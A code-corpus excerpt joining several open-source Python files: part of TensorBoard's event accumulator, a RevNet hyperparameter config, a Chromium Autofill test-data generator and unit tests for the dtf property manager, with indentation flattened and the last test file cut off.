self._ProcessHealthPill(
event.wall_time, event.step, node_name, output_slot, elements)
def Tags(self):
"""Return all tags found in the value stream.
Returns:
A `{tagType: ['list', 'of', 'tags']}` dictionary.
"""
return {
IMAGES: self._images.Keys(),
AUDIO: self._audio.Keys(),
HISTOGRAMS: self._histograms.Keys(),
SCALARS: self._scalars.Keys(),
COMPRESSED_HISTOGRAMS: self._compressed_histograms.Keys(),
TENSORS: self._tensors.Keys(),
# Use a heuristic: if the metagraph is available, but
# graph is not, then we assume the metagraph contains the graph.
GRAPH: self._graph is not None,
META_GRAPH: self._meta_graph is not None,
RUN_METADATA: list(self._tagged_metadata.keys())
}
def Scalars(self, tag):
"""Given a summary tag, return all associated `ScalarEvent`s.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ScalarEvent`s.
"""
return self._scalars.Items(tag)
def HealthPills(self, node_name):
"""Returns all health pill values for a certain node.
Args:
node_name: The name of the node to obtain health pills for.
Raises:
KeyError: If the node name is not found.
Returns:
An array of `HealthPillEvent`s.
"""
return self._health_pills.Items(node_name)
def Graph(self):
"""Return the graph definition, if there is one.
If the graph is stored directly, return that. If no graph is stored
directly but a metagraph is stored containing a graph, return that.
Raises:
ValueError: If there is no graph for this run.
Returns:
The `graph_def` proto.
"""
graph = graph_pb2.GraphDef()
if self._graph is not None:
graph.ParseFromString(self._graph)
return graph
raise ValueError('There is no graph in this EventAccumulator')
def MetaGraph(self):
"""Return the metagraph definition, if there is one.
Raises:
ValueError: If there is no metagraph for this run.
Returns:
The `meta_graph_def` proto.
"""
if self._meta_graph is None:
raise ValueError('There is no metagraph in this EventAccumulator')
meta_graph = meta_graph_pb2.MetaGraphDef()
meta_graph.ParseFromString(self._meta_graph)
return meta_graph
def RunMetadata(self, tag):
"""Given a tag, return the associated session.run() metadata.
Args:
tag: A string tag associated with the event.
Raises:
ValueError: If the tag is not found.
Returns:
The metadata in form of `RunMetadata` proto.
"""
if tag not in self._tagged_metadata:
raise ValueError('There is no run metadata with this tag name')
run_metadata = RunMetadata()
run_metadata.ParseFromString(self._tagged_metadata[tag])
return run_metadata
def Histograms(self, tag):
"""Given a summary tag, return all associated histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `HistogramEvent`s.
"""
return self._histograms.Items(tag)
def CompressedHistograms(self, tag):
"""Given a summary tag, return all associated compressed histograms.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `CompressedHistogramEvent`s.
"""
return self._compressed_histograms.Items(tag)
def Images(self, tag):
"""Given a summary tag, return all associated images.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `ImageEvent`s.
"""
return self._images.Items(tag)
def Audio(self, tag):
"""Given a summary tag, return all associated audio.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `AudioEvent`s.
"""
return self._audio.Items(tag)
def Tensors(self, tag):
"""Given a summary tag, return all associated tensors.
Args:
tag: A string tag associated with the events.
Raises:
KeyError: If the tag is not found.
Returns:
An array of `TensorEvent`s.
"""
return self._tensors.Items(tag)
def _MaybePurgeOrphanedData(self, event):
"""Maybe purge orphaned data due to a TensorFlow crash.
When TensorFlow crashes at step T+O and restarts at step T, any events
written after step T are now "orphaned" and will be at best misleading if
they are included in TensorBoard.
This logic attempts to determine if there is orphaned data, and purge it
if it is found.
Args:
event: The event to use as a reference, to determine if a purge is needed.
"""
if not self.purge_orphaned_data:
return
## Check if the event happened after a crash, and purge expired tags.
if self.file_version and self.file_version >= 2:
## If the file_version is recent enough, use the SessionLog enum
## to check for restarts.
self._CheckForRestartAndMaybePurge(event)
else:
## If there is no file version, default to old logic of checking for
## out of order steps.
self._CheckForOutOfOrderStepAndMaybePurge(event)
def _CheckForRestartAndMaybePurge(self, event):
"""Check and discard expired events using SessionLog.START.
Check for a SessionLog.START event and purge all previously seen events
with larger steps, because they are out of date. Because of supervisor
threading, it is possible that this logic will cause the first few event
messages to be discarded since supervisor threading does not guarantee
that the START message is deterministically written first.
This method is preferred over _CheckForOutOfOrderStepAndMaybePurge which
can inadvertently discard events due to supervisor threading.
Args:
event: The event to use as reference. If the event is a START event, all
previously seen events with a greater event.step will be purged.
"""
if event.HasField(
'session_log') and event.session_log.status == SessionLog.START:
self._Purge(event, by_tags=False)
def _CheckForOutOfOrderStepAndMaybePurge(self, event):
"""Check for out-of-order event.step and discard expired events for tags.
Check if the event is out of order relative to the global most recent step.
If it is, purge outdated summaries for tags that the event contains.
Args:
event: The event to use as reference. If the event is out-of-order, all
events with the same tags, but with a greater event.step will be purged.
"""
if event.step < self.most_recent_step and event.HasField('summary'):
self._Purge(event, by_tags=True)
else:
self.most_recent_step = event.step
self.most_recent_wall_time = event.wall_time
def _ConvertHistogramProtoToTuple(self, histo):
return HistogramValue(min=histo.min,
max=histo.max,
num=histo.num,
sum=histo.sum,
sum_squares=histo.sum_squares,
bucket_limit=list(histo.bucket_limit),
bucket=list(histo.bucket))
def _ProcessHistogram(self, tag, wall_time, step, histo):
"""Processes a proto histogram by adding it to accumulated state."""
histo = self._ConvertHistogramProtoToTuple(histo)
histo_ev = HistogramEvent(wall_time, step, histo)
self._histograms.AddItem(tag, histo_ev)
self._compressed_histograms.AddItem(
tag, histo_ev, lambda x: _CompressHistogram(x, self._compression_bps))
def _ProcessImage(self, tag, wall_time, step, image):
"""Processes an image by adding it to accumulated state."""
event = ImageEvent(wall_time=wall_time,
step=step,
encoded_image_string=image.encoded_image_string,
width=image.width,
height=image.height)
self._images.AddItem(tag, event)
def _ProcessAudio(self, tag, wall_time, step, audio):
"""Processes an audio summary by adding it to accumulated state."""
event = AudioEvent(wall_time=wall_time,
step=step,
encoded_audio_string=audio.encoded_audio_string,
content_type=audio.content_type,
sample_rate=audio.sample_rate,
length_frames=audio.length_frames)
self._audio.AddItem(tag, event)
def _ProcessScalar(self, tag, wall_time, step, scalar):
"""Processes a simple value by adding it to accumulated state."""
sv = ScalarEvent(wall_time=wall_time, step=step, value=scalar)
self._scalars.AddItem(tag, sv)
def _ProcessTensor(self, tag, wall_time, step, tensor):
tv = TensorEvent(wall_time=wall_time, step=step, tensor_proto=tensor)
self._tensors.AddItem(tag, tv)
def _ProcessHealthPill(self, wall_time, step, node_name, output_slot,
elements):
"""Processes a health pill value by adding it to accumulated state.
Args:
wall_time: The time at which the health pill was created. Provided by the
debugger.
step: The step at which the health pill was created. Provided by the
debugger.
node_name: The name of the node for this health pill.
output_slot: The output slot for this health pill.
elements: An ND array of 12 floats. The elements of the health pill.
"""
# Key by the node name for fast retrieval of health pills by node name. The
# array is cast to a list so that it is JSON-able. The debugger data plugin
# serves a JSON response.
self._health_pills.AddItem(
node_name,
HealthPillEvent(
wall_time=wall_time,
step=step,
node_name=node_name,
output_slot=output_slot,
value=list(elements)))
def _Purge(self, event, by_tags):
"""Purge all events that have occurred after the given event.step.
If by_tags is True, purge all events that occurred after the given
event.step, but only for the tags that the event has. Non-sequential
event.steps suggest that a TensorFlow restart occurred, and we discard
the out-of-order events to display a consistent view in TensorBoard.
Discarding by tags is the safer method, when we are unsure whether a restart
has occurred, given that threading in supervisor can cause events of
different tags to arrive with unsynchronized step values.
If by_tags is False, then purge all events with event.step greater than the
given event.step. This can be used when we are certain that a TensorFlow
restart has occurred and these events can be discarded.
Args:
event: The event to use as reference for the purge. All events with
the same tags, but with a greater event.step will be purged.
by_tags: Bool to dictate whether to discard all out-of-order events or
only those that are associated with the given reference event.
"""
## Keep data in reservoirs that has a step less than event.step
_NotExpired = lambda x: x.step < event.step
if by_tags:
def _ExpiredPerTag(value):
return [getattr(self, x).FilterItems(_NotExpired, value.tag)
for x in self.accumulated_attrs]
expired_per_tags = [_ExpiredPerTag(value)
for value in event.summary.value]
expired_per_type = [sum(x) for x in zip(*expired_per_tags)]
else:
expired_per_type = [getattr(self, x).FilterItems(_NotExpired)
for x in self.accumulated_attrs]
if sum(expired_per_type) > 0:
purge_msg = _GetPurgeMessage(self.most_recent_step,
self.most_recent_wall_time, event.step,
event.wall_time, *expired_per_type)
logging.warn(purge_msg)
def _GetPurgeMessage(most_recent_step, most_recent_wall_time, event_step,
event_wall_time, num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio):
"""Return the string message associated with TensorBoard purges."""
return ('Detected out of order event.step likely caused by '
'a TensorFlow restart. Purging expired events from TensorBoard'
' display between the previous step: {} (timestamp: {}) and '
'current step: {} (timestamp: {}). Removing {} scalars, {} '
'histograms, {} compressed histograms, {} images, '
'and {} audio.').format(most_recent_step, most_recent_wall_time,
event_step, event_wall_time,
num_expired_scalars, num_expired_histos,
num_expired_comp_histos, num_expired_images,
num_expired_audio)
def _GeneratorFromPath(path):
"""Create an event generator for file or directory at given path string."""
if not path:
raise ValueError('path must be a valid string')
if IsTensorFlowEventsFile(path):
return event_file_loader.EventFileLoader(path)
else:
return directory_watcher.DirectoryWatcher(
path, event_file_loader.EventFileLoader, IsTensorFlowEventsFile)
def _ParseFileVersion(file_version):
"""Convert the string file_version in event.proto into a float.
Args:
file_version: String file_version from event.proto
Returns:
Version number as a float.
"""
tokens = file_version.split('brain.Event:')
try:
return float(tokens[-1])
except ValueError:
## This should never happen according to the definition of file_version
## specified in event.proto.
logging.warn(('Invalid event.proto file_version. Defaulting to use of '
'out-of-order event.step logic for purging expired events.'))
return -1
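# Minimal sketch of the expected behavior (the inputs here are assumptions;
# the 'brain.Event:<n>' format comes from the docstring above):
def _DemoParseFileVersion():
"""Illustrative only; not part of the original module."""
assert _ParseFileVersion('brain.Event:2') == 2.0
assert _ParseFileVersion('garbage') == -1 # falls back and logs a warning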
def _CompressHistogram(histo_ev, bps):
"""Creates fixed size histogram by adding compression to accumulated state.
This routine transforms a histogram at a particular step by linearly
interpolating its variable number of buckets to represent their cumulative
weight at a constant number of compression points. This significantly reduces
the size of the histogram and makes it suitable for a two-dimensional area
plot where the output of this routine constitutes the ranges for a single x
coordinate.
Args:
histo_ev: A HistogramEvent namedtuple.
bps: Compression points represented in basis points, 1/100ths of a percent.
Returns:
CompressedHistogramEvent namedtuple.
"""
# See also: Histogram::Percentile() in core/lib/histogram/histogram.cc
histo = histo_ev.histogram_value
if not histo.num:
return CompressedHistogramEvent(
histo_ev.wall_time,
histo_ev.step,
[CompressedHistogramValue(b, 0.0) for b in bps])
bucket = np.array(histo.bucket)
weights = (bucket * bps[-1] / (bucket.sum() or 1.0)).cumsum()
values = []
j = 0
while j < len(bps):
i = np.searchsorted(weights, bps[j], side='right')
while i < len(weights):
cumsum = weights[i]
cumsum_prev = weights[i - 1] if i > 0 else 0.0
if cumsum == cumsum_prev: # prevent remap divide by zero
i += 1
continue
if not i or not cumsum_prev:
lhs = histo.min
else:
lhs = max(histo.bucket_limit[i - 1], histo.min)
rhs = min(histo.bucket_limit[i], histo.max)
weight = _Remap(bps[j], cumsum_prev, cumsum, lhs, rhs)
values.append(CompressedHistogramValue(bps[j], weight))
j += 1
break
else:
break
while j < len(bps):
values.append(CompressedHistogramValue(bps[j], histo.max))
j += 1
return CompressedHistogramEvent(histo_ev.wall_time, histo_ev.step, values)
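# Illustrative sketch (not part of the original module): compress a tiny
# histogram at a single percentile. The namedtuple fields are inferred from
# _ConvertHistogramProtoToTuple above; the concrete values are assumptions.
def _DemoCompressHistogram():
histo = HistogramValue(min=0.0, max=4.0, num=4, sum=8.0, sum_squares=24.0,
bucket_limit=[2.0, 4.0], bucket=[2.0, 2.0])
ev = HistogramEvent(wall_time=0.0, step=1, histogram_value=histo)
# 2500 basis points == the 25th percentile; with this histogram the
# linearly interpolated value comes out at 2.0.
return _CompressHistogram(ev, bps=(2500,))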
def _Remap(x, x0, x1, y0, y1):
"""Linearly map from [x0, x1] unto [y0, y1]."""
return y0 + (x - x0) * float(y1 - y0) / (x1 - x0)
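# e.g. _Remap(5, 0, 10, 100, 200) == 150.0 (midpoints map to midpoints).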
| apache-2.0 |
dongjoon-hyun/tensorflow | tensorflow/contrib/eager/python/examples/revnet/config.py | 28 | 6581 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Reversible residual network compatible with eager execution.
Configuration in format of tf.contrib.training.HParams.
Supports CIFAR-10, CIFAR-100, and ImageNet datasets.
Reference [The Reversible Residual Network: Backpropagation
Without Storing Activations](https://arxiv.org/pdf/1707.04585.pdf)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
def get_hparams_cifar_38():
"""RevNet-38 configurations for CIFAR-10/CIFAR-100."""
config = tf.contrib.training.HParams()
config.add_hparam("num_train_images", 50000)
config.add_hparam("num_eval_images", 10000)
config.add_hparam("init_filters", 32)
config.add_hparam("init_kernel", 3)
config.add_hparam("init_stride", 1)
config.add_hparam("n_rev_blocks", 3)
config.add_hparam("n_res", [3, 3, 3])
config.add_hparam("filters", [32, 64, 112])
config.add_hparam("strides", [1, 2, 2])
config.add_hparam("batch_size", 100)
config.add_hparam("bottleneck", False)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", False)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 32, 32))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (32, 32, 3))
config.add_hparam("data_format", "channels_last")
# Training details
config.add_hparam("weight_decay", 2e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [40000, 60000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3])
config.add_hparam("max_train_iter", 80000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 1000)
config.add_hparam("div255", True)
# This is imprecise: when training with a validation set,
# we only have 40k images in the training data
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
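# Illustrative usage sketch (not part of the original module):
def _demo_cifar_38():
config = get_hparams_cifar_38()
# 80000 max iters / (50000 // 100) iters per epoch = 160 epochs on GPU/CPU.
return config.epochs, config.tpu_epochs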
def get_hparams_cifar_110():
"""RevNet-110 configurations for CIFAR-10/CIFAR-100."""
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
return config
def get_hparams_cifar_164():
"""RevNet-164 configurations for CIFAR-10/CIFAR-100."""
config = get_hparams_cifar_38()
config.filters = [32, 64, 128]
config.n_res = [9, 9, 9]
config.bottleneck = True
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
return config
def get_hparams_imagenet_56():
"""RevNet-56 configurations for ImageNet."""
config = tf.contrib.training.HParams()
config.add_hparam("n_classes", 1000)
config.add_hparam("dataset", "ImageNet")
config.add_hparam("num_train_images", 1281167)
config.add_hparam("num_eval_images", 50000)
config.add_hparam("init_filters", 128)
config.add_hparam("init_kernel", 7)
config.add_hparam("init_stride", 2)
config.add_hparam("n_rev_blocks", 4)
config.add_hparam("n_res", [2, 2, 2, 2])
config.add_hparam("filters", [128, 256, 512, 832])
config.add_hparam("strides", [1, 2, 2, 2])
config.add_hparam("batch_size", 256)
config.add_hparam("bottleneck", True)
config.add_hparam("fused", True)
config.add_hparam("init_max_pool", True)
if tf.test.is_gpu_available():
config.add_hparam("input_shape", (3, 224, 224))
config.add_hparam("data_format", "channels_first")
else:
config.add_hparam("input_shape", (224, 224, 3))
config.add_hparam("data_format", "channels_last")
# Due to bottleneck residual blocks
filters = [f * 4 for f in config.filters]
config.filters = filters
# Training details
config.add_hparam("weight_decay", 1e-4)
config.add_hparam("momentum", .9)
config.add_hparam("lr_decay_steps", [160000, 320000, 480000])
config.add_hparam("lr_list", [1e-1, 1e-2, 1e-3, 1e-4])
config.add_hparam("max_train_iter", 600000)
config.add_hparam("seed", 1234)
config.add_hparam("shuffle", True)
config.add_hparam("log_every", 500)
config.add_hparam("save_every", 500)
config.add_hparam("dtype", tf.float32)
config.add_hparam("eval_batch_size", 256)
config.add_hparam("div255", True)
config.add_hparam("iters_per_epoch",
config.num_train_images // config.batch_size)
config.add_hparam("epochs", config.max_train_iter // config.iters_per_epoch)
# Customized TPU hyperparameters due to differing batch size caused by
# TPU architecture specifics
# Suggested batch sizes to reduce overhead from excessive tensor padding
# https://cloud.google.com/tpu/docs/troubleshooting
config.add_hparam("tpu_batch_size", 1024)
config.add_hparam("tpu_eval_batch_size", 1024)
config.add_hparam("tpu_iters_per_epoch",
config.num_train_images // config.tpu_batch_size)
config.add_hparam("tpu_epochs",
config.max_train_iter // config.tpu_iters_per_epoch)
config.add_hparam("tpu_eval_steps",
config.num_eval_images // config.tpu_eval_batch_size)
return config
def get_hparams_imagenet_104():
"""RevNet-104 configurations for ImageNet."""
config = get_hparams_imagenet_56()
config.n_res = [2, 2, 11, 2]
return config
| apache-2.0 |
Crystalnix/BitPop | chrome/test/functional/autofill_dataset_generator.py | 11 | 9785 | #!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates profile dictionaries for Autofill.
Used to test autofill.AutofillTest.FormFillLatencyAfterSubmit.
Can be used as a stand-alone script; print the help text by running:
python autofill_dataset_generator.py -h
"""
import codecs
import logging
from optparse import OptionParser
import os
import random
import re
import sys
class NullHandler(logging.Handler):
def emit(self, record):
pass
class DatasetGenerator(object):
"""Generates a dataset of dictionaries.
The lists (such as address_construct, city_construct) define the way the
corresponding field is generated. They accomplish this by specifying a
list of function-args lists.
"""
address_construct = [
[ random.randint, 1, 10000],
[ None, u'foobar'],
[ random.choice, [ u'St', u'Ave', u'Ln', u'Ct', ]],
[ random.choice, [ u'#1', u'#2', u'#3', ]],
]
city_construct = [
[ random.choice, [ u'San Jose', u'San Francisco', u'Sacramento',
u'Los Angeles', ]],
]
state_construct = [
[ None, u'CA']
]
# These zip codes are now matched to the corresponding cities in
# city_construct.
zip_construct = [ u'95110', u'94109', u'94203', u'90120']
# Constant country value consumed by GenerateCountry(); without this the
# method would raise AttributeError if it were ever called.
country_construct = [
[ None, u'United States'],
]
logger = logging.getLogger(__name__)
logger.addHandler(NullHandler())
log_handlers = {'StreamHandler': None}
def __init__(self, output_filename=None, logging_level=None):
"""Constructs dataset generator object.
Creates the 'fields' data member, a list of two-element [key, generator] pairs.
These pairs are comprised of a field key e.g. u'NAME_FIRST' and a
generator method e.g. self.GenerateNameFirst which will generate the value.
If we want the value to always be the same e.g. u'John' we can use this
instead of a method. We can even use None keyword which will give
a value of u''.
'output_pattern' for one field would have been: "{u'NAME_FIRST': u'%s',}"
which is ready to accept a value for the 'NAME_FIRST' field key once
this value is generated.
'output_pattern' is used in 'GenerateNextDict()' to generate the next
dict line.
Args:
output_filename: specified filename of generated dataset to be saved.
Default value is None and no saving takes place.
logging_level: set verbosity levels, default is None.
"""
if logging_level:
if not self.log_handlers['StreamHandler']:
console = logging.StreamHandler()
console.setLevel(logging.INFO)
self.log_handlers['StreamHandler'] = console
self.logger.addHandler(console)
self.logger.setLevel(logging_level)
else:
if self.log_handlers['StreamHandler']:
self.logger.removeHandler(self.log_handlers['StreamHandler'])
self.log_handlers['StreamHandler'] = None
self.output_filename = output_filename
self.dict_no = 0
self.fields = [
[u'NAME_FIRST', self.GenerateNameFirst],
[u'NAME_MIDDLE', None],
[u'NAME_LAST', None],
[u'EMAIL_ADDRESS', self.GenerateEmail],
[u'COMPANY_NAME', None],
[u'ADDRESS_HOME_LINE1', self.GenerateAddress],
[u'ADDRESS_HOME_LINE2', None],
[u'ADDRESS_HOME_CITY', self.GenerateCity],
[u'ADDRESS_HOME_STATE', self.GenerateState],
[u'ADDRESS_HOME_ZIP', self.GenerateZip],
[u'ADDRESS_HOME_COUNTRY', u'United States'],
[u'PHONE_HOME_WHOLE_NUMBER', None],
]
self.next_dict = {}
# Using implicit line joining does not work well in this case, as each
# element has to be a string literal, not a function call that returns one.
self.output_pattern = u'{\'' + \
u', '.join([u'u"%s" : u"%%s"' % key for key, method in self.fields]) + \
u',}'
def _GenerateField(self, field_construct):
"""Generates each field in each dictionary.
Args:
field_construct: it is a list of lists.
The first value (index 0) of each containing list is a function or None.
The remaining values are the args. If function is None then arg is just
returned.
Example 1: zip_construct = [[ None, u'95110']]. There is one
containing list only and function here is None and arg is u'95110'.
This just returns u'95110'.
Example 2: address_construct = [ [ random.randint, 1, 10000],
[ None, u'foobar'] ] This has two containing lists and it will return
the result of:
random.randint(1, 10000) + ' ' + u'foobar'
which could be u'7832 foobar'
"""
parts = []
for function_and_args in field_construct:
function = function_and_args[0]
args = function_and_args[1:]
if not function:
function = lambda x: x
parts.append(str(function(*args)))
return (' ').join(parts)
def GenerateAddress(self):
"""Uses _GenerateField() and address_construct to gen a random address.
Returns:
A random address.
"""
return self._GenerateField(self.address_construct)
def GenerateCity(self):
"""Uses _GenerateField() and city_construct to gen a random city.
Returns:
A random city.
"""
return self._GenerateField(self.city_construct)
def GenerateState(self):
"""Uses _GenerateField() and state_construct to generate a state.
Returns:
A state.
"""
return self._GenerateField(self.state_construct)
def GenerateZip(self):
"""Uses zip_construct and generated cities to return a matched zip code.
Returns:
A zip code matched to the corresponding city.
"""
city_selected = self.next_dict['ADDRESS_HOME_CITY'][0]
index = self.city_construct[0][1].index(city_selected)
return self.zip_construct[index]
def GenerateCountry(self):
"""Uses _GenerateField() and country_construct to generate a country.
Returns:
A country.
"""
return self._GenerateField(self.country_construct)
def GenerateNameFirst(self):
"""Generates a numerical first name.
The name is the number of the current dict.
i.e. u'1', u'2', u'3'
Returns:
A numerical first name.
"""
return u'%s' % self.dict_no
def GenerateEmail(self):
"""Generates an email that corresponds to the first name.
i.e. u'[email protected]', u'[email protected]', u'[email protected]'
Returns:
An email address that corresponds to the first name.
"""
return u'%[email protected]' % self.dict_no
def GenerateNextDict(self):
"""Generates next dictionary of the dataset.
Returns:
The output dictionary.
"""
self.dict_no += 1
self.next_dict = {}
for key, method_or_value in self.fields:
if not method_or_value:
self.next_dict[key] = ['']
elif type(method_or_value) in [str, unicode]:
self.next_dict[key] = ['%s' % method_or_value]
else:
self.next_dict[key] = [method_or_value()]
return self.next_dict
def GenerateDataset(self, num_of_dict_to_generate=10):
"""Generates a list of dictionaries.
Args:
num_of_dict_to_generate: The number of dictionaries to be generated.
Default value is 10.
Returns:
The dictionary list.
"""
random.seed(0) # All randomly generated values are reproducible.
if self.output_filename:
output_file = codecs.open(
self.output_filename, mode='wb', encoding='utf-8-sig')
else:
output_file = None
try:
list_of_dict = []
if output_file:
output_file.write('[')
output_file.write(os.linesep)
while self.dict_no < num_of_dict_to_generate:
output_dict = self.GenerateNextDict()
list_of_dict.append(output_dict)
output_line = self.output_pattern % tuple(
[output_dict[key] for key, method in self.fields])
if output_file:
output_file.write(output_line)
output_file.write(os.linesep)
self.logger.info(
'%d: [%s]' % (self.dict_no, output_line.encode(sys.stdout.encoding,
'ignore')))
if output_file:
output_file.write(']')
output_file.write(os.linesep)
self.logger.info('%d dictionaries generated SUCCESSFULLY!', self.dict_no)
self.logger.info('--- FINISHED ---')
return list_of_dict
finally:
if output_file:
output_file.close()
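# Illustrative usage sketch; mirrors what main() below does with defaults.
def _demo_usage():
gen = DatasetGenerator(output_filename=None, logging_level=None)
profiles = gen.GenerateDataset(num_of_dict_to_generate=3)
# Each profile maps Autofill field keys to single-element value lists,
# e.g. profiles[0]['NAME_FIRST'] == [u'1'].
return profiles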
def main():
parser = OptionParser()
parser.add_option(
'-o', '--output', dest='output_filename', default='',
help='write output to FILE [optional]', metavar='FILE')
parser.add_option(
'-d', '--dict', type='int', dest='dict_no', metavar='DICT_NO', default=10,
help='DICT_NO: number of dictionaries to be generated [default: %default]')
parser.add_option(
'-l', '--log_level', dest='log_level', default='debug',
metavar='LOG_LEVEL',
help='LOG_LEVEL: "debug", "info", "warning" or "error" [default: %default]')
(options, args) = parser.parse_args()
if args:
parser.print_help()
return 1
options.log_level = options.log_level.lower()
if options.log_level not in ['debug', 'info', 'warning', 'error']:
parser.error('Wrong log_level argument.')
parser.print_help()
else:
if options.log_level == 'debug':
options.log_level = logging.DEBUG
elif options.log_level == 'info':
options.log_level = logging.INFO
elif options.log_level == 'warning':
options.log_level = logging.WARNING
elif options.log_level == 'error':
options.log_level = logging.ERROR
gen = DatasetGenerator(options.output_filename, options.log_level)
gen.GenerateDataset(options.dict_no)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
jakev/dtf | python-dtf/tests/unit/test_prop.py | 2 | 5430 | # Android Device Testing Framework ("dtf")
# Copyright 2013-2016 Jake Valletta (@jake_valletta)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""pytest for using dtf property manager"""
from __future__ import absolute_import
import pytest
import dtf.properties as prop
import dtf.testutils as testutils
# prop_set() tests
def test_set_new_property():
"""Attempt to set a new property (existing section)"""
value = '1'
contents = ("[info]\n"
"real = not_real")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
def test_set_new_section_property():
"""Set a property that has no section (yet)"""
value = '1'
testutils.deploy_config_raw("")
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_existing_property():
"""Set a property that already exists"""
value = 'new'
contents = ("[Info]\n"
"sdk = old")
testutils.deploy_config_raw(contents)
prop.set_prop('info', 'sdk', value)
assert prop.get_prop('info', 'sdk') == value
testutils.undeploy()
return 0
def test_set_property_casing():
"""Set a prop and try to retrieve with casing"""
sdk = '1'
testutils.deploy_config_raw("")
prop.set_prop('INFO', 'sdk', sdk)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_get() tests
def test_get_empty_config():
"""Attempts to get a property without a valid config"""
testutils.deploy_config_raw("")
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property():
"""Attempts to get a valid property"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
testutils.undeploy()
return 0
def test_get_property_no_option():
"""Attempt to get a property that doesn't exist"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
with pytest.raises(prop.PropertyError):
prop.get_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_get_property_casing():
"""Get a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
assert prop.get_prop('info', 'sdk') == sdk
assert prop.get_prop('Info', 'sdk') == sdk
assert prop.get_prop('INFO', 'sdk') == sdk
testutils.undeploy()
return 0
# prop_del() tests
def test_del_empty_config():
"""Attempts to delete a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property():
"""Attempts to delete a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
def test_del_property_invalid():
"""Attempts to delete a property that doesn't exist"""
contents = ("[Info]\n"
"vmtype = 64")
testutils.deploy_config_raw(contents)
assert prop.del_prop('info', 'sdk') != 0
testutils.undeploy()
return 0
def test_del_property_casing():
"""Delete a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
prop.del_prop('info', 'sdk')
testutils.undeploy()
return 0
# prop_test() tests
def test_test_empty_config():
"""Test a property without a valid config"""
testutils.deploy_config_raw("")
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property():
"""Test a valid property"""
contents = ("[Info]\n"
"sdk = 23")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 1
testutils.undeploy()
return 0
def test_test_invalid_property():
"""Test a missing property"""
contents = ("[Info]\n"
"vmtype = arm64")
testutils.deploy_config_raw(contents)
assert prop.test_prop('info', 'sdk') == 0
testutils.undeploy()
return 0
def test_test_property_casing():
"""Test a prop with alternating casing"""
sdk = '23'
contents = ("[Info]\n"
"sdk = %s" % sdk)
testutils.deploy_config_raw(contents)
